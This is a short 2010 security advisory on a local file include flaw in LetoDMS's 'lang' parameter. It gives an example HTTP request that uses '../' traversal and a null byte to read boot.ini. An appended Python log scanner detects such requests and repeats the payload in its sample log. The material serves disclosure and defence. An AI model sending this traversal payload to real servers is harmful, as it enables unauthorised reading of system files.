LetoDMS 'lang' Parameter Local File Include Vulnerability

An attacker can exploit this issue via a browser.

The following example HTTP request is available:

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1
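
Added example (not part of the original advisory or of LetoDMS): a log check a defender could run to find requests like the one above, flagging `lang` values that contain a null byte, `..` or a path separator once decoded. The log lines are constructed, and the allowlist pattern for legitimate language names is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: a legitimate language value is a short plain name (e.g. "English").
SAFE_LANG = re.compile(r"[A-Za-z0-9_-]{1,32}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; line 2 carries the request quoted in this advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /mydms/op/op.Login.php?login=guest&lang=English HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2010:10:00:05 +0000] "GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1" 200 734',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 200 318',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so nested encoding is normalised before checks."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the reasons a decoded 'lang' value is unsafe (empty list if acceptable)."""
    checks = [("null-byte", "\x00" in value), ("dot-dot", ".." in value),
              ("path-separator", "/" in value or "\\" in value)]
    reasons = [name for name, hit in checks if hit]
    if not reasons and not SAFE_LANG.fullmatch(value):
        reasons.append("not-allowlisted")
    return reasons

def scan_log(lines):
    """Return (line_number, decoded_value, reasons) for each suspicious 'lang' value."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if name == "lang" and value and classify(value):
                hits.append((number, value, classify(value)))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```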


 

Copyright 2010, SecurityFocus